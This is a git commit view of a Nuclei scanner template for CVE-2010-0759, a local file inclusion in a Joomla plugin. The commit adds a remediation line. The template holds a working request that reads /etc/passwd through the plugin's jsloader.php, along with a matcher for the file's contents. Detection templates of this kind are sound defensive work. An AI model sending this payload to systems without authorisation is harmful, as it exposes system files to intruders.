Enhancement: cves/2010/CVE-2010-0759.yaml by mp

patch-1
MostInterestingBotInTheWorld 2022-02-13 13:27:39 -05:00
parent 90fc75d603
commit dad31054f7
1 changed files with 4 additions and 5 deletions

View File

@ -1,5 +1,4 @@
id: CVE-2010-0759
info:
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
author: daffainfo
@ -9,19 +8,19 @@ info:
- https://www.exploit-db.com/exploits/11498
- https://www.cvedetails.com/cve/CVE-2010-0759
tags: cve,cve2010,joomla,lfi,plugin
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-0759
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13